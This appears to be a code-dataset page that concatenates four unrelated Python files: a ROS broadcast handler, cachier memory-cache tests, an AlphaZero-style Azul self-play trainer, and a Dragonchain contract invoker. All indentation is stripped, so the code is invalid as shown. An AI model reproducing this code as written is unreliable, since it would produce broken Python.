# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id$
import os
import json
import time
import socket
import struct
import decimal
import logging
import traceback
import threading
import functools
import rospy.core
from rospy.core import signal_shutdown
from rospy.impl.registration import Registration
from rospy.impl.registration import get_topic_manager
from rospy.impl.registration import get_service_manager
from rospy.impl.registration import get_node_handler
from rosgraph.network import parse_http_host_and_port,get_host_name
import sys
env = os.environ.get('LD_LIBRARY_PATH')
for sub_path in env.split(':'):
sys.path.append(sub_path)
from rospy.impl import participant
TIMESTAMP = 'timestamp'
NODE_NAME = 'node_name'
XMLRPC_URI = 'xmlrpc_uri'
REQUEST_TYPE = 'request_type'
NODE_TIME = "node_time"
TOPIC_NAME = "topic_name"
TOPIC_TYPE = "topic_type"
TOPIC_URI = "topic_uri"
SERVICE_NAME = "service_name"
SERVICE_TYPE = "service_type"
SERVICE_URI = "service_uri"
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
def byteify(input):
"""
Convert unicode to str.
"""
if isinstance(input, dict):
return {byteify(key): byteify(value) for key, value in input.iteritems()}
elif isinstance(input, list):
return [byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
class BroadcastHandler(object):
"""
BroadcastHandler.
"""
__metaclass__ = Singleton
def __init__(self, handler):
"""
brief info for: __init__
"""
super(BroadcastHandler, self).__init__()
self._logger = logging.getLogger(__name__)
self._logger.setLevel(logging.INFO)
self.callback = ["registerPublisher",
"unregisterPublisher",
"registerSubscriber",
"unregisterSubscriber",
"registerService",
"unregisterService",
"lookupService",
"getTopicTypes",
"lookupNode",
]
self._handler = handler
self._name = "rosmaster"
self._participant = participant.Participant(self._name)
self._participant.init_py()
self._broardcast_manager_thread = threading.Thread(
target=self.run, args=())
self._broardcast_manager_thread.setDaemon(True)
self._broardcast_manager_thread.start()
def run(self):
"""
brief info for: thread run method
"""
self._logger.debug("starting broadcast_manager!")
while True:
try:
msg = self._participant.read_msg()
if msg is None:
continue
if(len(msg) > 0):
data = self._unpack_msg(msg.strip())
self._logger.debug("recv data: %s " % data)
try:
cb = '_' + data[REQUEST_TYPE] + "Callback"
func = getattr(self, cb)
func(data)
except AttributeError:
pass
else:
time.sleep(0.005)
except Exception as e:
self._logger.error("broadcast_manager thread error is %s" % e)
finally:
pass
def getUri(self, caller_id):
"""
getUri
"""
return 1, "", self._uri
def getPid(self, caller_id):
"""
Get the PID of this server
"""
return 1, "", os.getpid()
def _registerPublisherCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
datatype = data[TOPIC_TYPE]
uri = data[XMLRPC_URI]
self._handler.registerPublisher(name, topic, datatype, uri)
def _unregisterPublisherCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
uri = data[TOPIC_URI]
self._handler.unregisterPublisher(name, topic, uri)
def _registerSubscriberCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
datatype = data[TOPIC_TYPE]
uri = data[XMLRPC_URI]
self._handler.registerSubscriber(name, topic, datatype, uri)
def _unregisterSubscriberCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
uri = data[TOPIC_URI]
self._handler.unregisterSubscriber(name, topic, uri)
def _registerServiceCallback(self, data):
name = data[NODE_NAME]
service_name = data[SERVICE_NAME]
service_uri = data[SERVICE_URI]
uri = data[XMLRPC_URI]
self._handler.registerService(name, service_name, service_uri, uri)
def _unregisterServiceCallback(self, data):
name = data[NODE_NAME]
service_name = data[SERVICE_NAME]
service_uri = data[SERVICE_URI]
self._handler.unregisterService(name, service_name, service_uri)
def _send(self, data):
"""
brief info for: Get _master_handler internal dict stuct according to dict_type
"""
self._participant.send(data)
def _recv(self, size=1024):
"""
brief info for: Get _master_handler internal dict stuct according to dict_type
"""
msg = addr = None
try:
msg, addr = self._sock.recvfrom(size)
except Exception as e:
self._logger.error("socket recv error is %s" % e)
self._logger.error(traceback.format_exc())
finally:
pass
return msg, addr
def _unpack_msg(self, msg):
try:
data = json.loads(msg, object_hook=byteify)
except Exception as e:
self._logger.error("parse json failed! %s" % e)
return data
def _pack_msg(self, data):
return json.dumps(data)
|
test_memory_core.py
|
"""Test for the in-memory implementation of the Cachier python package."""
import hashlib
import queue
import threading
from datetime import timedelta
from random import random
from time import sleep, time
import pytest
import pandas as pd
from cachier import cachier
@cachier(backend='memory', next_time=False)
def _takes_2_seconds(arg_1, arg_2):
"""Some function."""
sleep(2)
return 'arg_1:{}, arg_2:{}'.format(arg_1, arg_2)
@pytest.mark.memory
def test_memory_core():
"""Basic memory core functionality."""
_takes_2_seconds.clear_cache()
_takes_2_seconds('a', 'b')
start = time()
_takes_2_seconds('a', 'b', verbose_cache=True)
end = time()
assert end - start < 1
_takes_2_seconds.clear_cache()
SECONDS_IN_DELTA = 3
DELTA = timedelta(seconds=SECONDS_IN_DELTA)
@cachier(backend='memory', stale_after=DELTA, next_time=False)
def _stale_after_seconds(arg_1, arg_2):
"""Some function."""
return random()
@pytest.mark.memory
def test_stale_after():
"""Testing the stale_after functionality."""
_stale_after_seconds.clear_cache()
val1 = _stale_after_seconds(1, 2)
val2 = _stale_after_seconds(1, 2)
val3 = _stale_after_seconds(1, 3)
assert val1 == val2
assert val1 != val3
sleep(3)
val4 = _stale_after_seconds(1, 2)
assert val4 != val1
_stale_after_seconds.clear_cache()
@cachier(backend='memory', stale_after=DELTA, next_time=True)
def _stale_after_next_time(arg_1, arg_2):
"""Some function."""
return random()
@pytest.mark.memory
def test_stale_after_next_time():
"""Testing the stale_after with next_time functionality."""
_stale_after_next_time.clear_cache()
val1 = _stale_after_next_time(1, 2)
val2 = _stale_after_next_time(1, 2)
val3 = _stale_after_next_time(1, 3)
assert val1 == val2
assert val1 != val3
sleep(SECONDS_IN_DELTA + 1)
val4 = _stale_after_next_time(1, 2)
assert val4 == val1
sleep(0.5)
val5 = _stale_after_next_time(1, 2)
assert val5 != val1
_stale_after_next_time.clear_cache()
@cachier(backend='memory')
def _random_num():
return random()
@cachier(backend='memory')
def _random_num_with_arg(a):
# print(a)
return random()
@pytest.mark.memory
def test_overwrite_cache():
"""Tests that the overwrite feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(overwrite_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 == int3
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', overwrite_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 == int3
_random_num_with_arg.clear_cache()
@pytest.mark.memory
def test_ignore_cache():
"""Tests that the ignore_cache feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(ignore_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 != int3
assert int4 == int1
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', ignore_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 != int3
assert int4 == int1
_random_num_with_arg.clear_cache()
@cachier(backend='memory')
def _takes_time(arg_1, arg_2):
"""Some function."""
sleep(2) # this has to be enough time for check_calculation to run twice
return random() + arg_1 + arg_2
def _calls_takes_time(res_queue):
res = _takes_time(0.13, 0.02)
res_queue.put(res)
@pytest.mark.memory
def test_memory_being_calculated():
"""Testing memory core handling of being calculated scenarios."""
_takes_time.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier(backend='memory', stale_after=timedelta(seconds=1), next_time=True)
def _being_calc_next_time(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
def _calls_being_calc_next_time(res_queue):
res = _being_calc_next_time(0.13, 0.02)
res_queue.put(res)
@pytest.mark.memory
def test_being_calc_next_time():
"""Testing memory core handling of being calculated scenarios."""
_takes_time.clear_cache()
_being_calc_next_time(0.13, 0.02)
sleep(1.1)
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier(backend='memory')
def _bad_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
@cachier(backend='memory')
def _delete_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
@pytest.mark.memory
def test_clear_being_calculated():
"""Test memory core clear `being calculated` functionality."""
_takes_time.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread1.start()
_takes_time.clear_being_calculated()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 != res2
@pytest.mark.memory
def test_clear_being_calculated_with_empty_cache():
"""Test memory core clear `being calculated` functionality."""
_takes_time.clear_cache()
_takes_time.clear_being_calculated()
@cachier(backend='memory', stale_after=timedelta(seconds=1), next_time=True)
def _error_throwing_func(arg1):
if not hasattr(_error_throwing_func, 'count'):
_error_throwing_func.count = 0
_error_throwing_func.count += 1
if _error_throwing_func.count > 1:
raise ValueError("Tiny Rick!")
return 7
@pytest.mark.memory
def test_error_throwing_func():
# with
res1 = _error_throwing_func(4)
sleep(1.5)
res2 = _error_throwing_func(4)
assert res1 == res2
@pytest.mark.memory
def test_callable_hash_param():
def _hash_params(args, kwargs):
def _hash(obj):
if isinstance(obj, pd.core.frame.DataFrame):
return hashlib.sha256(
pd.util.hash_pandas_object(obj).values.tobytes()
).hexdigest()
return obj
k_args = tuple(map(_hash, args))
k_kwargs = tuple(sorted(
{k: _hash(v) for k, v in kwargs.items()}.items()))
return k_args + k_kwargs
@cachier(backend='memory', hash_params=_hash_params)
def _params_with_dataframe(*args, **kwargs):
"""Some function."""
return random()
_params_with_dataframe.clear_cache()
df_a = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
df_b = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
value_a = _params_with_dataframe(df_a, 1)
value_b = _params_with_dataframe(df_b, 1)
assert value_a == value_b # same content --> same key
value_a = _params_with_dataframe(1, df=df_a)
value_b = _params_with_dataframe(1, df=df_b)
assert value_a == value_b # same content --> same key
if __name__ == '__main__':
test_memory_being_calculated()
|
alphazul.py
|
import numpy as np
import tensorflow as tf
import mcts
from multiprocessing import Process,Pipe,Queue
import azul
import time
import random
DTYPE = tf.float32
NUM_HIDDEN = 384
NUM_LAYER = 4
STATES_SIZE = 155
MASK_SIZE = 180
REGULARIZATION_FACTOR = 1e-4
LEARNING_RATE = 1e-3
BATCH_SIZE = 32
EPOCH = 10
class InferenceNetwork(object):
"""docstring for InferenceNetwork"""
def __init__(self, input_size, output_size, num_layer=NUM_LAYER, num_hidden = NUM_HIDDEN):
self._graph = tf.Graph()
with self._graph.as_default():
with tf.name_scope('input_layer'):
self._input_states = tf.placeholder(DTYPE, [None,input_size], 'input_states')
self._mask = tf.placeholder(DTYPE, [None,output_size], 'mask')
with tf.name_scope('labels'):
self._label_value = tf.placeholder(DTYPE, [None,1], 'label_value')
self._label_distribution = tf.placeholder(tf.int32, [None], 'label_distribution')
with tf.name_scope('MLP'):
layer_out = self._input_states
for i in range(NUM_LAYER):
layer_out = tf.layers.dense(layer_out, NUM_HIDDEN, tf.nn.relu, name='MLP_layer_{}'.format(i))
with tf.name_scope('value_header'):
self._prediction_value = tf.layers.dense(layer_out, 1, tf.nn.tanh, name='value_layer')
with tf.name_scope('distribution_header'):
logits = tf.layers.dense(layer_out, output_size, name='logits')
# logits_min = tf.reduce_min(logits, axis = 1)
# masked_min = (self._mask - 1.) * logits_min
# masked_logits = logits * self._mask - masked_min
# masked_max = tf.reduce_max(masked_logits,axis=1)
# self._prediction_distribution = tf.exp(logits-masked_max)*self._mask/tf.reduce_sum(tf.exp(masked_logits-masked_max)*self._mask,axis=1)
masked_logits = logits + (self._mask - 1.) * tf.float32.max / 10
self._prediction_distribution = tf.nn.softmax(masked_logits)
with tf.name_scope('losses'):
self._policy_loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self._label_distribution, logits = masked_logits))
self._value_loss = tf.losses.mean_squared_error(labels=self._label_value, predictions=self._prediction_value)
self._reg_loss = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * REGULARIZATION_FACTOR
self._loss = self._policy_loss + self._value_loss + self._reg_loss
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)
self._train_op = optimizer.minimize(self._loss)
init = tf.global_variables_initializer()
self._saver = tf.train.Saver()
self._sess = tf.Session(graph = self._graph)
try:
self.restore()
except ValueError as e:
print(e)
self._sess.run(init)
self.save()
writer = tf.summary.FileWriter("./tensorboard/log/", self._sess.graph)
writer.close()
def predict(self, input_states, mask):
feed_dict = {
self._input_states:input_states,
self._mask:mask,
}
value_p, distribution_p = self._sess.run([self._prediction_value,self._prediction_distribution],feed_dict=feed_dict)
return value_p, distribution_p
def train(self,states,acitons,values,masks):
feed_dict = {
self._input_states:states,
self._label_value:values,
self._label_distribution:acitons,
self._mask:masks
}
policy_loss,value_loss,reg_loss,loss,_ = self._sess.run([self._policy_loss,self._value_loss,self._reg_loss,self._loss,self._train_op],feed_dict=feed_dict)
print('\n')
print('policy_loss',policy_loss)
print('value_loss:',value_loss)
print('reg_loss:',reg_loss)
print('loss:',loss)
print('\n')
self.save()
def save(self, path="./model/latest.ckpt"):
self._saver.save(self._sess, path)
def restore(self, path="./model/latest.ckpt"):
self._saver.restore(self._sess, path)
def close(self):
self._sess.close()
class InfHelper(object):
"""docstring for InfHelper"""
def __init__(self, w2s_conn):
self._w2s_conn = w2s_conn
def __call__(self, game):
self._w2s_conn.send((game.states(), game.flat_mask(), False))
value, prior = self._w2s_conn.recv()
return value, prior
class InfHelperS(object):
"""docstring for InfHelperS"""
def __init__(self, state_size = STATES_SIZE, mask_size = MASK_SIZE):
self._infnet = InferenceNetwork(state_size,mask_size)
def __call__(self,game):
states = game.states().reshape([1,-1])
mask = game.flat_mask().reshape([1,-1])
return self._infnet.predict(states,mask)
def worker_routine(game, w2s_conn, public_q):
commands = np.argwhere(np.ones((6,5,6))==1)
inf_helper = InfHelper(w2s_conn)
search = mcts.MCTSearch(game, inf_helper, commands)
accumulated_data = []
winner = None
while True:
action_command, training_data = search.start_search(300)
accumulated_data.append(training_data)
is_turn_end = game.take_command(action_command)
if is_turn_end:
game.turn_end(verbose = False)
if game.is_terminal:
game.final_score(verbose=True)
w2s_conn.send([True]*3)
winner = game.leading_player_num
print('end in', game.turn)
break
else:
game.start_turn()
if game.turn >= 11:
w2s_conn.send([True]*3)
game.final_score()
winner = game.leading_player_num
print('exceeding turn 10')
break
search = mcts.MCTSearch(game, inf_helper, commands)
else:
##########################
search.change_root()
# search = mcts.MCTSearch(game, inf_helper, commands)
#########################
state_data,action_data,value_data,mask_data = [],[],[],[]
for state, action_index, player,mask in accumulated_data:
state_data.append(state)
action_data.append(action_index)
mask_data.append(mask)
if player == winner:
value_data.append(1.)
else:
value_data.append(-1.)
public_q.put((state_data,action_data,value_data,mask_data))
def server_routine(s2w_conns, num_processes=8):
infnet = InferenceNetwork(STATES_SIZE, MASK_SIZE)
done_flags = [False] * 8
dummy = azul.Azul(2)
dummy.start()
dummy_status = (dummy.states(), dummy.flat_mask())
while True:
if all(done_flags):
break
states,masks = [],[]
for i in range(num_processes):
if done_flags[i]:
state, mask = dummy_status
else:
state, mask, flag = s2w_conns[i].recv()
if flag == True:
done_flags[i] = True
state, mask = dummy_status
states.append(state)
masks.append(mask)
states = np.stack(states, axis=0)
masks = np.stack(masks, axis=0)
values, priors = infnet.predict(states, masks)
for i in range(num_processes):
if not done_flags[i]:
s2w_conns[i].send((values[i], priors[i]))
infnet.close()
def self_play():
processes = []
s2w_conns = []
public_q = Queue()
# define workers
for i in range(8):
game = azul.Azul(2)
game.start()
w2s_conn, s2w_conn = Pipe()
s2w_conns.append(s2w_conn)
p = Process(target=worker_routine, args=(game, w2s_conn, public_q))
processes.append(p)
# define server
server = Process(target=server_routine, args=(s2w_conns,))
# start process
server.start()
for p in processes:
p.start()
min_length = 999
all_data = []
for i in range(8):
state_data,action_data,value_data,mask_data = public_q.get()
if len(state_data) <= min_length:
min_length = len(state_data)
all_data.append((state_data,action_data,value_data,mask_data))
state_data_all,action_data_all,value_data_all,mask_data_all = [],[],[],[]
for state_data,action_data,value_data,mask_data in all_data:
data_zip = list(zip(state_data,action_data,value_data,mask_data))
random.shuffle(data_zip)
state_data,action_data,value_data,mask_data = list(zip(*data_zip))
state_data_all.extend(state_data[:min_length])
action_data_all.extend(action_data[:min_length])
value_data_all.extend(value_data[:min_length])
mask_data_all.extend(mask_data[:min_length])
state_data_all = np.stack(state_data_all)
action_data_all = np.stack(action_data_all)
value_data_all = np.stack(value_data_all).reshape((-1,1))
mask_data_all = np.stack(mask_data_all)
assert len(state_data_all) == len(action_data_all) and len(state_data_all) == len(value_data_all) and len(state_data_all) == len(mask_data_all)
permutated_index = np.random.permutation(len(state_data_all))
permutated_state = state_data_all[permutated_index]
permutated_action = action_data_all[permutated_index]
permutated_value = value_data_all[permutated_index]
permutated_mask = mask_data_all[permutated_index]
for p in processes:
p.join()
server.join()
num_iter = len(permutated_state)//BATCH_SIZE
infnet = InferenceNetwork(STATES_SIZE, MASK_SIZE)
for i in range(num_iter):
infnet.train(permutated_state[i*BATCH_SIZE:(i+1)*BATCH_SIZE],
permutated_action[i*BATCH_SIZE:(i+1)*BATCH_SIZE],permutated_value[i*BATCH_SIZE:(i+1)*BATCH_SIZE],
permutated_mask[i*BATCH_SIZE:(i+1)*BATCH_SIZE])
print(i)
infnet.close()
def debug():
game = azul.Azul(2)
game.start()
commands = np.argwhere(np.ones((6,5,6))==1)
inf_helper = InfHelperS()
search = mcts.MCTSearch(game, inf_helper, commands)
searches= [search]
accumulated_data = []
winner = None
while True:
action_command, training_data = search.start_search(300)
accumulated_data.append(training_data)
is_turn_end = game.take_command(action_command)
if is_turn_end:
game.turn_end(verbose = False)
if game.is_terminal:
game.final_score()
winner = game.leading_player_num
break
else:
game.start_turn()
search = mcts.MCTSearch(game, inf_helper, commands)
else:
# search.change_root()
search = mcts.MCTSearch(game, inf_helper, commands)
searches.append(search)
state_data,action_data,value_data = [],[],[]
for state, action_index, player in accumulated_data:
state_data.append(state)
action_index = str(action_index//30) + str((action_index%30)//6) + str(action_index%6)
action_data.append(action_index)
if player == winner:
value_data.append(1.)
else:
value_data.append(-1.)
return state_data,action_data,value_data,searches
if __name__ == '__main__':
self_play()
# state_data,action_data,value_data,searches = debug()
# print(value_data)
# print(action_data)
# for search in searches:
# print(search._root.visit_count)
# print(search._root.prior.reshape((6,5,6)))
# print(search._root.child_Ws.reshape((6,5,6)),search._root.child_Ns.reshape((6,5,6)))
# print('\n\n')
|
contract_invoker.py
|
# Copyright 2019 Dragonchain, Inc.
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
# You may obtain a copy of the Apache License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
import json
import random
import asyncio
from queue import Queue
from threading import Thread
import aiohttp
import fastjsonschema
from dragonchain.lib.dto import schema
from dragonchain.lib.dao import smart_contract_dao
from dragonchain.lib.database import redis
from dragonchain.contract_invoker import contract_invoker_service
from dragonchain import logger
from dragonchain.lib import error_reporter
_log = logger.get_logger()
_serial_worker_threads: dict = {}
_serial_queues: dict = {}
_validate_sc_invoke_request = fastjsonschema.compile(schema.smart_contract_invoke_request_schema)
def setup() -> None:
_log.info("Initializing contract service...")
restart_dead_workers()
_log.info("Service initialized!")
async def start() -> None:
_log.info("Checking for any previously in-process SC invocations that need to be re-queued")
# Recover contracts that didn't finish processing (in case of crash, etc)
events = await redis.hgetall_async("mq:contract-processing", decode=False)
event_list = []
for _, value in events.items():
event_list.append(value)
if event_list:
# Push them to the front of the queue, and reset current processing list
await redis.rpush_async("mq:contract-invoke", *event_list)
await redis.delete_async("mq:contract-processing")
_log.info("Starting event loop")
session = aiohttp.ClientSession()
try:
while True:
await process_events(session)
except Exception:
await session.close()
raise
async def process_events(session: aiohttp.ClientSession) -> None:
try:
unique_id = str(random.randint(0, 9999999999999)) # nosec (not needed for cryptographic purposes)
_, event = await redis.brpop_async("mq:contract-invoke", timeout=0, decode=False)
# Place into in process queue for safety (deleted after contract finishes invoking)
await redis.hset_async("mq:contract-processing", unique_id, event)
_log.info(f"Receieved contract invocation request {event}")
event = json.loads(event)
_validate_sc_invoke_request(event)
event["unique_id"] = unique_id
except Exception:
await redis.hdel_async("mq:contract-processing", unique_id)
_log.exception("Invalid contract invocation request")
raise
# Invoke the contract!
if event["execution_order"] == "parallel":
# Invoke the contract asynchronously with the event loop. "fire-and-forget"
asyncio.create_task(contract_invoker_service.invoke(session, event))
elif event["execution_order"] == "serial":
_log.info(f"Executing contract {event['contract_id']} as serial")
# Ensure the worker is running
existing_thread = _serial_worker_threads.get(event["contract_id"])
if not existing_thread or not existing_thread.is_alive():
restart_serial_worker(event["contract_id"])
# Queue the actual job for the serial worker
_serial_queues[event["contract_id"]].put(event, block=False)
else:
_log.warning(f"Invalid execution order on invocation request: {event}")
# TODO: Push event to failed queue.
def restart_serial_worker(contract_id: str) -> None:
_log.info(f"Restarting worker {contract_id}")
_serial_queues[contract_id] = Queue()
_serial_worker_threads[contract_id] = Thread(target=asyncio.run, args=[serial_contract_worker(contract_id)], daemon=True)
_serial_worker_threads[contract_id].start()
def restart_dead_workers() -> None:
for contract in smart_contract_dao.get_serial_contracts():
restart_serial_worker(contract.id)
async def serial_contract_worker(contract_id: str) -> None:
session = aiohttp.ClientSession()
_log.info(f"Worker started for contract {contract_id}")
while True:
try:
event = _serial_queues[contract_id].get(block=True) # Blocks until receives from queue
_log.info(f"Executing {contract_id}")
await contract_invoker_service.invoke(session, event)
except Exception:
_log.exception("Error invoking serial contract")
def error_handler(loop: "asyncio.AbstractEventLoop", context: dict) -> None:
exception = context.get("exception")
if exception:
message = error_reporter.get_exception_message(exception)
error_reporter.report_exception(exception, message)
loop.stop()
loop.close()
if __name__ == "__main__":
try:
setup()
event_loop = asyncio.get_event_loop()
event_loop.set_exception_handler(error_handler)
event_loop.run_until_complete(start())
except Exception as e:
error_reporter.report_exception(e, "Error running contract invoker")
raise
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.